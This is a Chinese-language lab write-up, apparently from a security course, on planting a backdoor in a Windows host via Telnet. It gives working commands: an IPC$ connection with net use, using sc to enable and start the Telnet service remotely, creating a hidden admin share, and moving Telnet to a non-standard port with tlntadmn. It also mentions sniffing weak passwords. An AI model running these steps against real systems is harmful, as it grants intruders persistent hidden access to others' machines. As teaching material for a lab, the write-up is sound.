系統後門種植實驗-TELNET學習記錄
本地開啟Telnet服務
進入主機A,右鍵“我的電腦”->管理->服務和應用程式->服務,找到Telnet服務,如圖所示:
遠端開啟Telnet服務
(1)首先用流光嗅探等工具探得到對方密碼,主要是弱口令(此步可跳過,用已知的實驗機使用者名稱密碼進行試驗)。
(2)在主機B的“控制面板-工具-資料夾選項-檢視-簡單的檔案共享”去掉選取。
(3)右鍵“我的電腦”->管理->服務和應用程式->服務,找到Telnet服務,關閉之:
(4)回到主機A用net use命令建立ipc$連線(主機使用者名稱密碼可在實驗環境右側“切換”滑鼠懸浮時看到)
命令:net use \\10.1.1.119\ipc$ "主機B的密碼" /user:administrator
(5)用sc命令把禁用的telnet服務變成自動
命令:sc \\10.1.1.119 config tlntsvr start= auto
(6)在主機B上可以檢視telnet的啟動型別已經變為自動:
(7)用sc命令將telnet啟動
命令:sc \\10.1.1.119 start tlntsvr
在主機B上可以檢視telnet服務已經啟動:
(8)新建一個cmd環境進行telnet登入:telnet 10.1.1.119,telnet連線建立之後,可輸入使用者名稱密碼等相關資訊進行登入,telnet服務登入到遠端主機:
(9)登入後便可進行共享等相關操作,net share建立c$共享
命令:net share abc$=c:
檢視共享目錄:net share
(10)遠端更改telnet埠
輸入tlntadmn \\10.1.1.119 config port=1000 -u administrator -p 主機B的密碼
再次進行telnet連線,則使用埠1000。
課後習題: